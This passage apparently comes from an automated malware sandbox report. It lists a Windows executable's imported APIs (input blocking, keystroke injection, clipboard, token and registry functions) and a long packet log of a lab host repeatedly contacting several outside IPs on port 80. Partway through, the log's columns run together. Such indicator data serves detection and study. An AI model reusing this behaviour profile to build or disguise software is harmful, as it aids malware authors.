GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                        GDI32.dll | DeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                        COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
                                        ADVAPI32.dll | RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                        SHELL32.dll | DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                        ole32.dll | OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                        OLEAUT32.dll | VariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
                                        Language of compilation system | Country where language is spoken | Map
                                        English | Great Britain
                                        English | United States
                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                        Sep 27, 2024 06:34:54.678596020 CEST | 54952 | 80 | 192.168.2.7 | 208.91.197.27
                                        Sep 27, 2024 06:34:54.683518887 CEST | 80 | 54952 | 208.91.197.27 | 192.168.2.7
                                        Sep 27, 2024 06:34:54.683602095 CEST | 54952 | 80 | 192.168.2.7 | 208.91.197.27
                                        Sep 27, 2024 06:34:54.691826105 CEST | 54952 | 80 | 192.168.2.7 | 208.91.197.27
                                        Sep 27, 2024 06:34:54.696703911 CEST | 80 | 54952 | 208.91.197.27 | 192.168.2.7
                                        Sep 27, 2024 06:34:55.683835030 CEST | 80 | 54952 | 208.91.197.27 | 192.168.2.7
                                        Sep 27, 2024 06:34:55.683855057 CEST | 80 | 54952 | 208.91.197.27 | 192.168.2.7
                                        Sep 27, 2024 06:34:55.683870077 CEST | 80 | 54952 | 208.91.197.27 | 192.168.2.7
                                        Sep 27, 2024 06:34:55.684098959 CEST | 80 | 54952 | 208.91.197.27 | 192.168.2.7
                                        Sep 27, 2024 06:34:55.684144020 CEST | 54952 | 80 | 192.168.2.7 | 208.91.197.27
                                        Sep 27, 2024 06:34:55.684170961 CEST | 54952 | 80 | 192.168.2.7 | 208.91.197.27
                                        Sep 27, 2024 06:34:55.684190989 CEST | 80 | 54952 | 208.91.197.27 | 192.168.2.7
                                        Sep 27, 2024 06:34:55.684250116 CEST | 54952 | 80 | 192.168.2.7 | 208.91.197.27
                                        Sep 27, 2024 06:34:55.696656942 CEST | 54952 | 80 | 192.168.2.7 | 208.91.197.27
                                        Sep 27, 2024 06:34:55.701565981 CEST | 80 | 54952 | 208.91.197.27 | 192.168.2.7
                                        Sep 27, 2024 06:35:15.880361080 CEST | 54953 | 80 | 192.168.2.7 | 38.180.87.102
                                        Sep 27, 2024 06:35:15.885274887 CEST | 80 | 54953 | 38.180.87.102 | 192.168.2.7
                                        Sep 27, 2024 06:35:15.885359049 CEST | 54953 | 80 | 192.168.2.7 | 38.180.87.102
                                        Sep 27, 2024 06:35:15.897653103 CEST | 54953 | 80 | 192.168.2.7 | 38.180.87.102
                                        Sep 27, 2024 06:35:15.902602911 CEST | 80 | 54953 | 38.180.87.102 | 192.168.2.7
                                        Sep 27, 2024 06:35:16.508824110 CEST | 80 | 54953 | 38.180.87.102 | 192.168.2.7
                                        Sep 27, 2024 06:35:16.508842945 CEST | 80 | 54953 | 38.180.87.102 | 192.168.2.7
                                        Sep 27, 2024 06:35:16.508933067 CEST | 54953 | 80 | 192.168.2.7 | 38.180.87.102
                                        Sep 27, 2024 06:35:17.405538082 CEST | 54953 | 80 | 192.168.2.7 | 38.180.87.102
                                        Sep 27, 2024 06:35:18.425544977 CEST | 54954 | 80 | 192.168.2.7 | 38.180.87.102
                                        Sep 27, 2024 06:35:18.430536985 CEST | 80 | 54954 | 38.180.87.102 | 192.168.2.7
                                        Sep 27, 2024 06:35:18.430670023 CEST | 54954 | 80 | 192.168.2.7 | 38.180.87.102
                                        Sep 27, 2024 06:35:18.448776960 CEST | 54954 | 80 | 192.168.2.7 | 38.180.87.102
                                        Sep 27, 2024 06:35:18.453668118 CEST | 80 | 54954 | 38.180.87.102 | 192.168.2.7
                                        Sep 27, 2024 06:35:19.045104027 CEST | 80 | 54954 | 38.180.87.102 | 192.168.2.7
                                        Sep 27, 2024 06:35:19.045126915 CEST | 80 | 54954 | 38.180.87.102 | 192.168.2.7
                                        Sep 27, 2024 06:35:19.045423985 CEST | 54954 | 80 | 192.168.2.7 | 38.180.87.102
                                        Sep 27, 2024 06:35:19.952358007 CEST | 54954 | 80 | 192.168.2.7 | 38.180.87.102
                                        Sep 27, 2024 06:35:20.971487999 CEST | 54955 | 80 | 192.168.2.7 | 38.180.87.102
                                        Sep 27, 2024 06:35:20.979198933 CEST | 80 | 54955 | 38.180.87.102 | 192.168.2.7
                                        Sep 27, 2024 06:35:20.979327917 CEST | 54955 | 80 | 192.168.2.7 | 38.180.87.102
                                        Sep 27, 2024 06:35:20.990653992 CEST | 54955 | 80 | 192.168.2.7 | 38.180.87.102
                                        Sep 27, 2024 06:35:20.999362946 CEST | 80 | 54955 | 38.180.87.102 | 192.168.2.7
                                        Sep 27, 2024 06:35:21.000423908 CEST | 80 | 54955 | 38.180.87.102 | 192.168.2.7
                                        Sep 27, 2024 06:35:21.592946053 CEST | 80 | 54955 | 38.180.87.102 | 192.168.2.7
                                        Sep 27, 2024 06:35:21.593079090 CEST | 80 | 54955 | 38.180.87.102 | 192.168.2.7
                                        Sep 27, 2024 06:35:21.593308926 CEST | 54955 | 80 | 192.168.2.7 | 38.180.87.102
                                        Sep 27, 2024 06:35:22.499413013 CEST | 54955 | 80 | 192.168.2.7 | 38.180.87.102
                                        Sep 27, 2024 06:35:23.519046068 CEST | 54956 | 80 | 192.168.2.7 | 38.180.87.102
                                        Sep 27, 2024 06:35:23.526169062 CEST | 80 | 54956 | 38.180.87.102 | 192.168.2.7
                                        Sep 27, 2024 06:35:23.526294947 CEST | 54956 | 80 | 192.168.2.7 | 38.180.87.102
                                        Sep 27, 2024 06:35:23.533736944 CEST | 54956 | 80 | 192.168.2.7 | 38.180.87.102
                                        Sep 27, 2024 06:35:23.540617943 CEST | 80 | 54956 | 38.180.87.102 | 192.168.2.7
                                        Sep 27, 2024 06:35:24.168652058 CEST | 80 | 54956 | 38.180.87.102 | 192.168.2.7
                                        Sep 27, 2024 06:35:24.175406933 CEST | 80 | 54956 | 38.180.87.102 | 192.168.2.7
                                        Sep 27, 2024 06:35:24.175621033 CEST | 54956 | 80 | 192.168.2.7 | 38.180.87.102
                                        Sep 27, 2024 06:35:24.176412106 CEST | 54956 | 80 | 192.168.2.7 | 38.180.87.102
                                        Sep 27, 2024 06:35:24.181154966 CEST | 80 | 54956 | 38.180.87.102 | 192.168.2.7
                                        Sep 27, 2024 06:35:29.822575092 CEST | 54957 | 80 | 192.168.2.7 | 43.154.104.247
                                        Sep 27, 2024 06:35:29.827600002 CEST | 80 | 54957 | 43.154.104.247 | 192.168.2.7
                                        Sep 27, 2024 06:35:29.827758074 CEST | 54957 | 80 | 192.168.2.7 | 43.154.104.247
                                        Sep 27, 2024 06:35:29.838633060 CEST | 54957 | 80 | 192.168.2.7 | 43.154.104.247
                                        Sep 27, 2024 06:35:29.843558073 CEST | 80 | 54957 | 43.154.104.247 | 192.168.2.7
                                        Sep 27, 2024 06:35:31.343064070 CEST | 54957 | 80 | 192.168.2.7 | 43.154.104.247
                                        Sep 27, 2024 06:35:31.391011000 CEST | 80 | 54957 | 43.154.104.247 | 192.168.2.7
                                        Sep 27, 2024 06:35:32.362214088 CEST | 54958 | 80 | 192.168.2.7 | 43.154.104.247
                                        Sep 27, 2024 06:35:32.367242098 CEST | 80 | 54958 | 43.154.104.247 | 192.168.2.7
                                        Sep 27, 2024 06:35:32.367332935 CEST | 54958 | 80 | 192.168.2.7 | 43.154.104.247
                                        Sep 27, 2024 06:35:32.379057884 CEST | 54958 | 80 | 192.168.2.7 | 43.154.104.247
                                        Sep 27, 2024 06:35:32.385006905 CEST | 80 | 54958 | 43.154.104.247 | 192.168.2.7
                                        Sep 27, 2024 06:35:33.890130997 CEST | 54958 | 80 | 192.168.2.7 | 43.154.104.247
                                        Sep 27, 2024 06:35:33.939106941 CEST | 80 | 54958 | 43.154.104.247 | 192.168.2.7
                                        Sep 27, 2024 06:35:34.908941031 CEST | 54959 | 80 | 192.168.2.7 | 43.154.104.247
                                        Sep 27, 2024 06:35:34.913888931 CEST | 80 | 54959 | 43.154.104.247 | 192.168.2.7
                                        Sep 27, 2024 06:35:34.913995028 CEST | 54959 | 80 | 192.168.2.7 | 43.154.104.247
                                        Sep 27, 2024 06:35:34.934557915 CEST | 54959 | 80 | 192.168.2.7 | 43.154.104.247
                                        Sep 27, 2024 06:35:34.939410925 CEST | 80 | 54959 | 43.154.104.247 | 192.168.2.7
                                        Sep 27, 2024 06:35:34.939529896 CEST | 80 | 54959 | 43.154.104.247 | 192.168.2.7
                                        Sep 27, 2024 06:35:36.462774992 CEST | 54959 | 80 | 192.168.2.7 | 43.154.104.247
                                        Sep 27, 2024 06:35:36.511037111 CEST | 80 | 54959 | 43.154.104.247 | 192.168.2.7
                                        Sep 27, 2024 06:35:37.471451998 CEST | 54960 | 80 | 192.168.2.7 | 43.154.104.247
                                        Sep 27, 2024 06:35:37.476341009 CEST | 80 | 54960 | 43.154.104.247 | 192.168.2.7
                                        Sep 27, 2024 06:35:37.476501942 CEST | 54960 | 80 | 192.168.2.7 | 43.154.104.247
                                        Sep 27, 2024 06:35:37.486563921 CEST | 54960 | 80 | 192.168.2.7 | 43.154.104.247
                                        Sep 27, 2024 06:35:37.494517088 CEST | 80 | 54960 | 43.154.104.247 | 192.168.2.7
                                        Sep 27, 2024 06:35:51.218204975 CEST | 80 | 54957 | 43.154.104.247 | 192.168.2.7
                                        Sep 27, 2024 06:35:51.218481064 CEST | 54957 | 80 | 192.168.2.7 | 43.154.104.247
                                        Sep 27, 2024 06:35:53.725658894 CEST | 80 | 54958 | 43.154.104.247 | 192.168.2.7
                                        Sep 27, 2024 06:35:53.725756884 CEST | 54958 | 80 | 192.168.2.7 | 43.154.104.247
                                        Sep 27, 2024 06:35:56.291906118 CEST | 80 | 54959 | 43.154.104.247 | 192.168.2.7
                                        Sep 27, 2024 06:35:56.291974068 CEST | 54959 | 80 | 192.168.2.7 | 43.154.104.247
                                        Sep 27, 2024 06:35:58.856642008 CEST | 80 | 54960 | 43.154.104.247 | 192.168.2.7
                                        Sep 27, 2024 06:35:58.860133886 CEST | 54960 | 80 | 192.168.2.7 | 43.154.104.247
                                        Sep 27, 2024 06:35:58.873687983 CEST | 54960 | 80 | 192.168.2.7 | 43.154.104.247
                                        Sep 27, 2024 06:35:58.878515959 CEST | 80 | 54960 | 43.154.104.247 | 192.168.2.7
                                        Sep 27, 2024 06:36:03.893845081 CEST | 54961 | 80 | 192.168.2.7 | 13.248.169.48
                                        Sep 27, 2024 06:36:03.898727894 CEST | 80 | 54961 | 13.248.169.48 | 192.168.2.7
                                        Sep 27, 2024 06:36:03.898869991 CEST | 54961 | 80 | 192.168.2.7 | 13.248.169.48
                                        Sep 27, 2024 06:36:03.912205935 CEST | 54961 | 80 | 192.168.2.7 | 13.248.169.48
                                        Sep 27, 2024 06:36:03.916992903 CEST | 80 | 54961 | 13.248.169.48 | 192.168.2.7
                                        Sep 27, 2024 06:36:04.385149956 CEST | 80 | 54961 | 13.248.169.48 | 192.168.2.7
                                        Sep 27, 2024 06:36:04.385468006 CEST | 54961 | 80 | 192.168.2.7 | 13.248.169.48
                                        Sep 27, 2024 06:36:05.421437979 CEST | 54961 | 80 | 192.168.2.7 | 13.248.169.48
                                        Sep 27, 2024 06:36:05.426341057 CEST | 80 | 54961 | 13.248.169.48 | 192.168.2.7
                                        Sep 27, 2024 06:36:06.440943003 CEST | 54962 | 80 | 192.168.2.7 | 13.248.169.48
                                        Sep 27, 2024 06:36:06.445914984 CEST | 80 | 54962 | 13.248.169.48 | 192.168.2.7
                                        Sep 27, 2024 06:36:06.446050882 CEST | 54962 | 80 | 192.168.2.7 | 13.248.169.48
                                        Sep 27, 2024 06:36:06.460464954 CEST | 54962 | 80 | 192.168.2.7 | 13.248.169.48
                                        Sep 27, 2024 06:36:06.465367079 CEST | 80 | 54962 | 13.248.169.48 | 192.168.2.7
                                        Sep 27, 2024 06:36:06.916492939 CEST | 80 | 54962 | 13.248.169.48 | 192.168.2.7
                                        Sep 27, 2024 06:36:06.916562080 CEST | 54962 | 80 | 192.168.2.7 | 13.248.169.48
                                        Sep 27, 2024 06:36:07.968156099 CEST | 54962 | 80 | 192.168.2.7 | 13.248.169.48
                                        Sep 27, 2024 06:36:07.972954035 CEST | 80 | 54962 | 13.248.169.48 | 192.168.2.7
                                        Sep 27, 2024 06:36:08.987880945 CEST | 54963 | 80 | 192.168.2.7 | 13.248.169.48
                                        Sep 27, 2024 06:36:08.992764950 CEST | 80 | 54963 | 13.248.169.48 | 192.168.2.7
                                        Sep 27, 2024 06:36:08.992856979 CEST | 54963 | 80 | 192.168.2.7 | 13.248.169.48
                                        Sep 27, 2024 06:36:09.004013062 CEST | 54963 | 80 | 192.168.2.7 | 13.248.169.48
                                        Sep 27, 2024 06:36:09.009298086 CEST | 80 | 54963 | 13.248.169.48 | 192.168.2.7
                                        Sep 27, 2024 06:36:09.009308100 CEST | 80 | 54963 | 13.248.169.48 | 192.168.2.7
                                        Sep 27, 2024 06:36:09.471436024 CEST | 80 | 54963 | 13.248.169.48 | 192.168.2.7
                                        Sep 27, 2024 06:36:09.471548080 CEST | 54963 | 80 | 192.168.2.7 | 13.248.169.48
                                        Sep 27, 2024 06:36:10.530081987 CEST | 54963 | 80 | 192.168.2.7 | 13.248.169.48
                                        Sep 27, 2024 06:36:10.534923077 CEST805496313.248.169.48192.168.2.7
                                        Sep 27, 2024 06:36:11.536587954 CEST5496480192.168.2.713.248.169.48
                                        Sep 27, 2024 06:36:11.541548967 CEST805496413.248.169.48192.168.2.7
                                        Sep 27, 2024 06:36:11.541651011 CEST5496480192.168.2.713.248.169.48
                                        Sep 27, 2024 06:36:11.549455881 CEST5496480192.168.2.713.248.169.48
                                        Sep 27, 2024 06:36:11.554255009 CEST805496413.248.169.48192.168.2.7
                                        Sep 27, 2024 06:36:12.006295919 CEST805496413.248.169.48192.168.2.7
                                        Sep 27, 2024 06:36:12.006316900 CEST805496413.248.169.48192.168.2.7
                                        Sep 27, 2024 06:36:12.006460905 CEST5496480192.168.2.713.248.169.48
                                        Sep 27, 2024 06:36:12.009444952 CEST5496480192.168.2.713.248.169.48
                                        Sep 27, 2024 06:36:12.014219999 CEST805496413.248.169.48192.168.2.7
                                        Sep 27, 2024 06:36:17.039906979 CEST5496580192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:17.044791937 CEST80549653.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:17.044905901 CEST5496580192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:17.057209015 CEST5496580192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:17.062124014 CEST80549653.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:17.524646044 CEST80549653.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:17.524713039 CEST5496580192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:18.562042952 CEST5496580192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:18.566907883 CEST80549653.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:19.581072092 CEST5496680192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:19.586105108 CEST80549663.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:19.586179972 CEST5496680192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:19.599750042 CEST5496680192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:19.604568005 CEST80549663.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:20.060712099 CEST80549663.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:20.061801910 CEST5496680192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:21.108913898 CEST5496680192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:21.113830090 CEST80549663.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:22.136323929 CEST5496780192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:22.152652979 CEST80549673.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:22.152796030 CEST5496780192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:22.174774885 CEST5496780192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:22.179764032 CEST80549673.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:22.181905031 CEST80549673.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:22.608810902 CEST80549673.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:22.609006882 CEST5496780192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:23.693701029 CEST5496780192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:23.698673010 CEST80549673.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:24.711456060 CEST5496880192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:24.716401100 CEST80549683.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:24.716484070 CEST5496880192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:24.737642050 CEST5496880192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:24.742477894 CEST80549683.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:25.188066959 CEST80549683.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:25.188160896 CEST80549683.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:25.188257933 CEST5496880192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:25.247760057 CEST5496880192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:25.252615929 CEST80549683.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:30.272088051 CEST5496980192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:30.277009010 CEST80549693.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:30.277821064 CEST5496980192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:30.289741993 CEST5496980192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:30.294632912 CEST80549693.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:31.796447039 CEST5496980192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:31.801881075 CEST80549693.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:31.805831909 CEST5496980192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:32.817729950 CEST5497080192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:32.822532892 CEST80549703.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:32.822652102 CEST5497080192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:32.842016935 CEST5497080192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:32.846748114 CEST80549703.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:33.286336899 CEST80549703.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:33.286391020 CEST5497080192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:34.359270096 CEST5497080192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:34.364515066 CEST80549703.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:35.378650904 CEST5497180192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:35.383491039 CEST80549713.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:35.383586884 CEST5497180192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:35.396697998 CEST5497180192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:35.401645899 CEST80549713.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:35.401813030 CEST80549713.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:35.841047049 CEST80549713.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:35.841118097 CEST5497180192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:36.906980991 CEST5497180192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:36.911834955 CEST80549713.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:37.955050945 CEST5497280192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:37.959794998 CEST80549723.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:37.961796045 CEST5497280192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:37.969007015 CEST5497280192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:37.973969936 CEST80549723.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:38.438513041 CEST80549723.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:38.438674927 CEST80549723.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:38.438935995 CEST5497280192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:38.441523075 CEST5497280192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:38.446304083 CEST80549723.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:43.483994007 CEST5497380192.168.2.7162.0.238.238
                                        Sep 27, 2024 06:36:43.488737106 CEST8054973162.0.238.238192.168.2.7
                                        Sep 27, 2024 06:36:43.489972115 CEST5497380192.168.2.7162.0.238.238
                                        Sep 27, 2024 06:36:43.500741959 CEST5497380192.168.2.7162.0.238.238
                                        Sep 27, 2024 06:36:43.505561113 CEST8054973162.0.238.238192.168.2.7
                                        Sep 27, 2024 06:36:44.078306913 CEST8054973162.0.238.238192.168.2.7
                                        Sep 27, 2024 06:36:44.078377008 CEST8054973162.0.238.238192.168.2.7
                                        Sep 27, 2024 06:36:44.078424931 CEST5497380192.168.2.7162.0.238.238
                                        Sep 27, 2024 06:36:45.017751932 CEST5497380192.168.2.7162.0.238.238
                                        Sep 27, 2024 06:36:46.034519911 CEST5497480192.168.2.7162.0.238.238
                                        Sep 27, 2024 06:36:46.039288044 CEST8054974162.0.238.238192.168.2.7
                                        Sep 27, 2024 06:36:46.039359093 CEST5497480192.168.2.7162.0.238.238
                                        Sep 27, 2024 06:36:46.054124117 CEST5497480192.168.2.7162.0.238.238
                                        Sep 27, 2024 06:36:46.058885098 CEST8054974162.0.238.238192.168.2.7
                                        Sep 27, 2024 06:36:46.661902905 CEST8054974162.0.238.238192.168.2.7
                                        Sep 27, 2024 06:36:46.662081957 CEST8054974162.0.238.238192.168.2.7
                                        Sep 27, 2024 06:36:46.662271023 CEST5497480192.168.2.7162.0.238.238
                                        Sep 27, 2024 06:36:47.565767050 CEST5497480192.168.2.7162.0.238.238
                                        Sep 27, 2024 06:36:48.912147999 CEST5497580192.168.2.7162.0.238.238
                                        Sep 27, 2024 06:36:48.917134047 CEST8054975162.0.238.238192.168.2.7
                                        Sep 27, 2024 06:36:48.917221069 CEST5497580192.168.2.7162.0.238.238
                                        Sep 27, 2024 06:36:48.929270029 CEST5497580192.168.2.7162.0.238.238
                                        Sep 27, 2024 06:36:48.934232950 CEST8054975162.0.238.238192.168.2.7
                                        Sep 27, 2024 06:36:48.934242964 CEST8054975162.0.238.238192.168.2.7
                                        Sep 27, 2024 06:36:49.533869028 CEST8054975162.0.238.238192.168.2.7
                                        Sep 27, 2024 06:36:49.533998966 CEST8054975162.0.238.238192.168.2.7
                                        Sep 27, 2024 06:36:49.534054041 CEST5497580192.168.2.7162.0.238.238
                                        Sep 27, 2024 06:36:50.437227964 CEST5497580192.168.2.7162.0.238.238
                                        Sep 27, 2024 06:36:51.456443071 CEST5497680192.168.2.7162.0.238.238
                                        Sep 27, 2024 06:36:51.463252068 CEST8054976162.0.238.238192.168.2.7
                                        Sep 27, 2024 06:36:51.465847015 CEST5497680192.168.2.7162.0.238.238
                                        Sep 27, 2024 06:36:51.473756075 CEST5497680192.168.2.7162.0.238.238
                                        Sep 27, 2024 06:36:51.478632927 CEST8054976162.0.238.238192.168.2.7
                                        Sep 27, 2024 06:36:52.047997952 CEST8054976162.0.238.238192.168.2.7
                                        Sep 27, 2024 06:36:52.048017979 CEST8054976162.0.238.238192.168.2.7
                                        Sep 27, 2024 06:36:52.048136950 CEST5497680192.168.2.7162.0.238.238
                                        Sep 27, 2024 06:36:52.118011951 CEST5497680192.168.2.7162.0.238.238
                                        Sep 27, 2024 06:36:52.123461008 CEST8054976162.0.238.238192.168.2.7
                                        Sep 27, 2024 06:36:57.145180941 CEST5497780192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:57.150454998 CEST80549773.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:57.150580883 CEST5497780192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:57.165026903 CEST5497780192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:57.172893047 CEST80549773.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:58.671478987 CEST5497780192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:58.676640034 CEST80549773.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:58.677810907 CEST5497780192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:59.889765024 CEST5497880192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:59.894687891 CEST80549783.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:59.900166988 CEST5497880192.168.2.73.33.130.190
                                        Sep 27, 2024 06:37:00.077619076 CEST5497880192.168.2.73.33.130.190
                                        Sep 27, 2024 06:37:00.082432032 CEST80549783.33.130.190192.168.2.7
                                        Sep 27, 2024 06:37:01.304496050 CEST80549783.33.130.190192.168.2.7
                                        Sep 27, 2024 06:37:01.304579973 CEST5497880192.168.2.73.33.130.190
                                        Sep 27, 2024 06:37:01.577883005 CEST5497880192.168.2.73.33.130.190
                                        Sep 27, 2024 06:37:01.582719088 CEST80549783.33.130.190192.168.2.7
                                        Sep 27, 2024 06:37:02.596853971 CEST5497980192.168.2.73.33.130.190
                                        Sep 27, 2024 06:37:02.601639032 CEST80549793.33.130.190192.168.2.7
                                        Sep 27, 2024 06:37:02.601828098 CEST5497980192.168.2.73.33.130.190
                                        Sep 27, 2024 06:37:02.613140106 CEST5497980192.168.2.73.33.130.190
                                        Sep 27, 2024 06:37:02.617963076 CEST80549793.33.130.190192.168.2.7
                                        Sep 27, 2024 06:37:02.618314981 CEST80549793.33.130.190192.168.2.7
                                        Sep 27, 2024 06:37:03.057991028 CEST80549793.33.130.190192.168.2.7
                                        Sep 27, 2024 06:37:03.058041096 CEST5497980192.168.2.73.33.130.190
                                        Sep 27, 2024 06:37:04.124636889 CEST5497980192.168.2.73.33.130.190
                                        Sep 27, 2024 06:37:04.129484892 CEST80549793.33.130.190192.168.2.7
                                        Sep 27, 2024 06:37:05.268264055 CEST5498080192.168.2.73.33.130.190
                                        Sep 27, 2024 06:37:05.273139954 CEST80549803.33.130.190192.168.2.7
